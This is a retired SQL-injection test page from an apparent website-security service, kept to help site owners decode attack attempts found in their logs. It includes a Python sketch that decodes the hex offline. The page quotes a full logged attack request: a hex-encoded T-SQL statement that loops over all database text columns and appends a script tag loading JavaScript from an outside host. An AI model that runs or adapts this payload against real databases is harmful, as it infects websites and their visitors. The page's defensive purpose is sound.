
SQL injection attack/attempt test page

If you reached this page, you tried the SQL injection attack test without passing the malicious SQL statement as a query parameter.

May 17th 2015: After almost 7 years, and hundreds of thousands of test submissions, we have decided to retire this tool.

Attack methods have changed, new tools have emerged, and with the popularity of WordPress and other CMS frameworks, other hacks have become more common and their implications have become more devastating for the website owners.
Therefore we have moved on to helping users clean up their infected websites quickly and efficiently.
If you have been hacked, penalized by Google or have any other website issues, please contact us!

Thanks to everyone who found this tool helpful!

Translate your code below

It seems like a lot of people are lost when it comes to translating/decoding the hexadecimal value of the SQL statement.
Copy and paste the whole request from your logfile - the request might look like this:

/yourfilename.php?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661
726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F
437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D
207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420
616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335
206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437
572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4
043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465
205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372
633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970
743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C
2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737
273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626
C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C
4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);


in the field below and we will try to decode it for you (we did our best but it might or might not work for everyone, especially since the statements are likely to change):
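For readers who want to decode such a log entry offline, here is a Python sketch added as an example; it is not the code behind the retired tool. It URL-decodes the logged request, pulls out every CAST(0x... AS CHAR) literal and returns the text it encodes. Assumptions: the function and variable names are hypothetical, the sample request is constructed around a harmless statement, and CHAR data is treated as Latin-1 (NCHAR/NVARCHAR as UTF-16LE).

```python
import re
from urllib.parse import unquote

# The wrapper seen in the logged request: CAST(0x<hex digits> AS CHAR(n)).
# VARCHAR / NCHAR / NVARCHAR variants are accepted as well (assumption: the
# attacker may vary the type). Whitespace inside the hex run is tolerated
# because log viewers and e-mail clients often wrap long lines.
CAST_HEX = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f\s]+?)\s+AS\s+(N?(?:VAR)?CHAR)", re.IGNORECASE
)


def decode_logged_request(request):
    """Return the decoded text of each CAST(0x... AS CHAR) literal found."""
    text = unquote(request)  # %20 -> space, %3B -> ';', and so on
    decoded = []
    for hex_run, sql_type in CAST_HEX.findall(text):
        hex_run = re.sub(r"\s+", "", hex_run)   # undo line wrapping
        if len(hex_run) % 2:                     # log entry cut mid-byte
            hex_run = hex_run[:-1]
        raw = bytes.fromhex(hex_run)
        # N-prefixed types hold UTF-16LE; plain CHAR is read as Latin-1 here.
        encoding = "utf-16-le" if sql_type.upper().startswith("N") else "latin-1"
        decoded.append(raw.decode(encoding, errors="replace"))
    return decoded


# Constructed sample: same request shape as the log entry above, but the hex
# encodes a harmless statement instead of a real payload.
SAMPLE_STATEMENT = "SELECT name FROM demo"
SAMPLE_REQUEST = (
    "/yourfilename.php?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x"
    + SAMPLE_STATEMENT.encode("latin-1").hex().upper()
    + "%20AS%20CHAR(4000));EXEC(@S);"
)

if __name__ == "__main__":
    for statement in decode_logged_request(SAMPLE_REQUEST):
        print(statement)
```

The decoded text is only ever returned as a string for reading; nothing in the sketch sends it to a database.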

Related blog postings

SQL injection attempts: no end in sight?

SQL injection attack attempts: Part 2: Answers

SQL injection attacks: Part 3: Securing your forms and preventing SQL injection attempts (PHP/MySQL)

SQL injection attacks: Part 4: What the JavaScript does
